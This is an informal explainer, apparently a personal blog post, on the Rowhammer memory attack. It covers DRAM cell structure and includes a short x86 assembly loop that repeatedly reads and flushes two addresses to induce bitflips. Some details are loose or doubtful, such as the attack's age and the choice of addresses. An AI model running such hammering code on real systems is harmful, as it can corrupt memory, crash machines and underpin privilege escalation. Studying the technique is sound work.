Hi, I'm just reading up on Rowhammer, and I just want to put everything I already know down here.
Rowhammer is an attack method to create bitflips by reading specific memory addresses in RAM millions of times.
This attack method is relatively new, it has existed for about 5 years. It is a combination of virtual and physical attack on the memory. Due to the fast reading of data at memory addresses, it can happen that at neighboring memory addresses, their values change due to BitFlips.
This attack has so far worked on DRAM, and more recently on ECC-RAM. The RAM is a circuit board with several memory chips. A memory chip is constructed in such a way that internally all memory addresses are arranged line by line. A small sketch shows how a memory chip looks roughly.
A single line looks in detail like this, that we have 2 Lines. A wordline and a bitline. Both lines are used to access the individual memory cells, reading and writing.
A memory cell is constructed as follows, using a transistor or FET (field effect transistor) and a capacitor. The capacitor stores the voltage, i.e. the zero (0V) or the one(1.2V - 1.5V).
The transistor is connected with the base to the wordline. As soon as voltage is applied to the base, it switches through. The bitline can then either be used to discharge the capacitor or to charge it with voltage.
The other terminal of the capacitor is connected to ground. The capacitor must be refreshed again and again, because it is completely discharged after a short time.
Due to the fast and frequent access to addresses, an electrical field is generated, which may lead to neighboring addresses being manipulated or influenced. So bitflips occur, which causes a faulty behavior of the computer. This can be: program errors, program crashes or even a crash of the operating system. This can be exploited to bypass security mechanisms, e.g. to gain root privileges.
section .text
global _start
_start:
mov ecx, 0xfffdd000; set address X from victims row
mov edx, 0xfffdd002; set address Y from victims row
_hammer:
mov eax, [ecx]
mov ebx, [edx]
clflush [ecx]
clflush [edx]
jmp short _hammer
An example code in assembler, which executes a Rowhammer attack. I have simply taken 2 addresses, which are connected to the memory row 0xfffdd001 to be manipulated. These are to move the memory row 0xfffdd001 then to bitflips. Here I should mention, that it is best to look for memory addresses, which are more effective or vulnerable. I have taken here now which do not have large effects, in order to avoid crashes.
The attack looks then like from the assembler code. Here, the addresses (red) are accessed with a high frequency until individual bit errors occur in the neighboring addresses (gray).
This attack works not only on normal computers but also on notebooks, tables and smartphones.